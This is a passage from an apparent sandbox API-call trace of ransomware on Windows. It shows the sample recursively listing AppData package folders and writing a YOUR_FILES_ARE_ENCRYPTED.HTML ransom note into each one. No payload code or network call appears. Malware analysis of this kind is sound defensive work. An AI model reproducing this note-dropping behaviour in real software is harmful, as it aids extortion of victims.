returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AC\\INetHistory\\*" [0115.528] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AC\\INetHistory\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4e9402ca, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e9402ca, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e9402ca, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dc38, dwReserved1=0x315e000, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0115.528] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4e9402ca, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e9402ca, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e9402ca, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dc38, dwReserved1=0x315e000, cFileName="..", cAlternateFileName="")) returned 1 [0115.528] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4e9402ca, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e9402ca, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e9402ca, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dc38, dwReserved1=0x315e000, cFileName="..", cAlternateFileName="")) returned 0 [0115.528] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0115.528] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 131 [0115.528] GetProcessHeap () returned 0x600000 [0115.528] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.529] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bioenrollment_cw5n1h2txyewy\\ac\\inethistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0115.531] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0115.532] CloseHandle (hObject=0x324) returned 1 [0115.532] GetProcessHeap () returned 0x600000 [0115.532] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.532] GetProcessHeap () returned 0x600000 [0115.532] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0115.532] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4e9402ca, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e9402ca, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e9402ca, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315e0a6, dwReserved1=0x315dff8, cFileName="Temp", cAlternateFileName="")) returned 1 [0115.532] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.532] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AC\\Temp") returned 94 [0115.532] GetProcessHeap () returned 0x600000 [0115.532] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0115.533] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AC\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AC\\Temp" [0115.533] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AC\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AC\\Temp\\*" [0115.533] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AC\\Temp\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4e9402ca, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e9402ca, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e9402ca, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dc38, dwReserved1=0x315e000, cFileName=".", cAlternateFileName="")) returned 0x626838 [0115.533] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4e9402ca, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e9402ca, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e9402ca, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dc38, dwReserved1=0x315e000, cFileName="..", cAlternateFileName="")) returned 1 [0115.533] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4e9402ca, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e9402ca, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e9402ca, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dc38, dwReserved1=0x315e000, cFileName="..", cAlternateFileName="")) returned 0 [0115.533] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0115.533] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 124 [0115.533] GetProcessHeap () returned 0x600000 [0115.533] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.533] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bioenrollment_cw5n1h2txyewy\\ac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0115.534] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0115.535] CloseHandle (hObject=0x324) returned 1 [0115.536] GetProcessHeap () returned 0x600000 [0115.536] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.536] GetProcessHeap () returned 0x600000 [0115.536] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0115.536] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4e9402ca, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e9402ca, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e9402ca, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315e0a6, dwReserved1=0x315dff8, cFileName="Temp", cAlternateFileName="")) returned 0 [0115.536] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0115.536] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 119 [0115.536] GetProcessHeap () returned 0x600000 [0115.536] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.536] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bioenrollment_cw5n1h2txyewy\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0115.537] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.538] CloseHandle (hObject=0x32c) returned 1 [0115.538] GetProcessHeap () returned 0x600000 [0115.538] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.538] GetProcessHeap () returned 0x600000 [0115.538] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.539] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4e8352ee, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e8352ee, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e8352ee, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0115.539] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.539] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AppData") returned 94 [0115.540] GetProcessHeap () returned 0x600000 [0115.540] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.540] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AppData" [0115.540] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AppData\\*" [0115.540] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4e8352ee, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e8352ee, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e8352ee, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315e0a6, dwReserved1=0x315dff8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0115.541] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4e8352ee, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e8352ee, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e8352ee, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315e0a6, dwReserved1=0x315dff8, cFileName="..", cAlternateFileName="")) returned 1 [0115.541] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4e8352ee, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e8352ee, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e8352ee, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315e0a6, dwReserved1=0x315dff8, cFileName="..", cAlternateFileName="")) returned 0 [0115.541] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0115.541] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 124 [0115.541] GetProcessHeap () returned 0x600000 [0115.541] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.541] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bioenrollment_cw5n1h2txyewy\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0115.542] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.543] CloseHandle (hObject=0x32c) returned 1 [0115.543] GetProcessHeap () returned 0x600000 [0115.543] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.543] GetProcessHeap () returned 0x600000 [0115.543] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.543] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4e79c89b, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e79c89b, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e79c89b, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0115.543] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.543] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\LocalCache") returned 97 [0115.543] GetProcessHeap () returned 0x600000 [0115.543] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.543] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\LocalCache" [0115.543] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\LocalCache\\*" [0115.543] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4e79c89b, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e79c89b, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e79c89b, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315e0a6, dwReserved1=0x315dff8, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0115.544] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4e79c89b, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e79c89b, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e79c89b, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315e0a6, dwReserved1=0x315dff8, cFileName="..", cAlternateFileName="")) returned 1 [0115.544] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4e79c89b, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e79c89b, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e79c89b, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315e0a6, dwReserved1=0x315dff8, cFileName="..", cAlternateFileName="")) returned 0 [0115.544] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0115.544] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0115.544] GetProcessHeap () returned 0x600000 [0115.544] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.544] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bioenrollment_cw5n1h2txyewy\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0115.545] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.546] CloseHandle (hObject=0x32c) returned 1 [0115.546] GetProcessHeap () returned 0x600000 [0115.546] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.546] GetProcessHeap () returned 0x600000 [0115.546] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.546] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4e7503f8, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e7503f8, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e7503f8, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0115.546] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.546] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\LocalState") returned 97 [0115.546] GetProcessHeap () returned 0x600000 [0115.546] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.546] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\LocalState" [0115.546] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\LocalState\\*" [0115.546] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4e7503f8, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e7503f8, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e7503f8, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315e0a6, dwReserved1=0x315dff8, cFileName=".", cAlternateFileName="")) returned 0x626838 [0115.546] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4e7503f8, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e7503f8, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e7503f8, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315e0a6, dwReserved1=0x315dff8, cFileName="..", cAlternateFileName="")) returned 1 [0115.546] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4e7503f8, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e7503f8, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e7503f8, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315e0a6, dwReserved1=0x315dff8, cFileName="..", cAlternateFileName="")) returned 0 [0115.546] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0115.546] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0115.546] 